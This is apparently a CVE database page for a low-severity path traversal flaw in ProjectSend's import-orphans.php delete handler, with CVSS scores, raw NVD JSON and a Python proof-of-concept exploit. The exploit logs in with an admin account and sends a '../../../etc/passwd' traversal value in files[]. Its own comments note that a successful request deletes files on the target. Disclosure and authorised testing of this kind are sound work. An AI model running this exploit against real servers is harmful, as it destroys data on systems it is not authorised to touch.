Security Vulnerability Report
CVE-2026-4044 CVSS 3.8 LOW

CVE-2026-4044

Published: 2026-03-12 16:16:12
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was detected in ProjectSend up to and including r1945. It affects the realpath() handling in /import-orphans.php (the "Delete Handler" component): a crafted value in the files[] parameter is not confined to the intended directory, resulting in path traversal (CWE-22). The attack is reachable over the network but, per the CVSS vector (PR:H), requires an authenticated high-privilege account. A public exploit exists and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L (NVD primary score). The same source also published a CVSS 4.0 vector with base score 2.0 LOW and a CVSS 2.0 vector with base score 4.7 MEDIUM (see the raw JSON below). Note C:N/I:L/A:L: the impact is to integrity and availability (a delete handler), not confidentiality, and PR:H means an authenticated high-privilege account is needed.

Configurations (Affected Products)

No configuration data available.

ProjectSend up to and including r1945 (range taken from the description; no NVD CPE configuration has been published for this CVE)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
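import requests
import sys

# CVE-2026-4044 PoC - ProjectSend Path Traversal in Delete Handler
# Target: ProjectSend <= r1945 ("up to r1945" in the advisory)
# Component: /import-orphans.php, Delete Handler (CWE-22)
# Vulnerability: path traversal via the files[] parameter
#
# NOTE(review): the advisory rates this C:N/I:L/A:L with PR:H, i.e. an
# authenticated high-privilege account can make the *delete* handler act on
# a path outside the intended directory.  Nothing in the advisory says the
# handler returns file contents, so a request that succeeds is destructive
# on the target and the response body is weak evidence either way.  In a
# lab, point ``payload`` at a canary file you planted rather than at
# /etc/passwd.

DEFAULT_PAYLOAD = "../../../etc/passwd"
DEFAULT_TIMEOUT = 10


def _login(session, target_url, username, password, timeout):
    """POST credentials to /login.php and return True if the session looks authenticated.

    The only signal available is the returned page: a 'logout' link in it is
    taken to mean the login succeeded.  This is a heuristic and can misfire on
    a customised login page.
    """
    response = session.post(
        f"{target_url}/login.php",
        data={"username": username, "password": password},
        timeout=timeout,
    )
    return "logout" in response.text.lower()


def _send_delete(session, target_url, payload, timeout):
    """Send the traversal payload to the delete handler and return the response.

    ``files[]`` is sent as a one-element list; requests encodes that as the
    repeated-key form PHP parses into an array (identical on the wire to the
    single string the original PoC sent).
    """
    return session.post(
        f"{target_url}/import-orphans.php",
        data={"action": "delete", "files[]": [payload]},
        timeout=timeout,
    )


def _looks_exploited(response, payload):
    """Return True when the response body echoes the traversed file.

    Kept from the original PoC for compatibility: it only ever fires if the
    handler leaks the target's contents, which the advisory does not claim
    (C:N).  A False result therefore does NOT prove the target is patched;
    confirm out of band (e.g. check whether the canary file disappeared).
    """
    if response.status_code != 200:
        return False
    # "root:" is the original /etc/passwd marker; the basename of the payload
    # reproduces the original "passwd" check for the default payload and
    # follows a custom canary path.  An empty basename (payload ending in
    # "/") is skipped because "" is a substring of everything.
    basename = payload.rsplit("/", 1)[-1]
    markers = [m for m in ("root:", basename) if m]
    body = response.text
    return any(marker in body for marker in markers)


def exploit_path_traversal(
    target_url,
    username,
    password,
    *,
    payload=DEFAULT_PAYLOAD,
    timeout=DEFAULT_TIMEOUT,
):
    """Exploit for CVE-2026-4044 - Path Traversal in ProjectSend.

    Args:
        target_url: Base URL of the ProjectSend instance; a trailing slash is
            tolerated.
        username: Valid high-privilege username (PR:H in the CVSS vector).
        password: Password for that account.
        payload: Value sent in ``files[]``.  Defaults to the original
            ``../../../etc/passwd`` for compatibility; prefer a canary file.
        timeout: Per-request timeout in seconds.

    Returns:
        True if the response body echoed the traversed file; False on login
        failure, transport error, or no marker in the response.  See
        ``_looks_exploited`` for why False is inconclusive.
    """
    base = target_url.rstrip("/")
    session = requests.Session()
    try:
        if not _login(session, base, username, password, timeout):
            print("[-] Login failed - check credentials")
            return False
        print("[+] Login successful")

        response = _send_delete(session, base, payload, timeout)
        print(f"[*] Exploit request sent to {base}/import-orphans.php")
        print(f"[*] Response status: {response.status_code}")

        if _looks_exploited(response, payload):
            print("[!] VULNERABLE - Path traversal confirmed")
            return True
        print("[-] Path traversal not confirmed in response")
        print("[*] Handler is delete-only per the advisory; verify the target file out of band")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False
    finally:
        session.close()


if __name__ == "__main__":
    # Three positional arguments plus the script name: the original checked
    # for < 5 and so rejected a correct three-argument invocation.
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://target.com admin password")
        sys.exit(1)
    target, user, pwd = sys.argv[1:4]
    exploit_path_traversal(target, user, pwd)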

References (see the `references` array in the raw JSON below: three VulDB entries for id 350656 and a Google Drive link supplied by the reporter)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4044", "sourceIdentifier": "[email protected]", "published": "2026-03-12T16:16:11.863", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in projectsend up to r1945. This affects the function realpath of the file /import-orphans.php of the component Delete Handler. Performing a manipulation of the argument files[] results in path traversal. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en projectsend hasta r1945. Esto afecta a la función realpath del archivo /import-orphans.PHP del componente Gestor de Eliminación. Realizar una manipulación del argumento files[] resulta en salto de ruta. Es posible la explotación remota del ataque. El exploit es ahora público y puede ser utilizado. 
El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:P", "baseScore": 4.7, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://drive.google.com/file/d/1BOWm9FvhmM90oP91rOWpI4GoWdbI06wg/view?usp=sharing", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.350656", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.350656", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769528", "source": "[email protected]"}]}}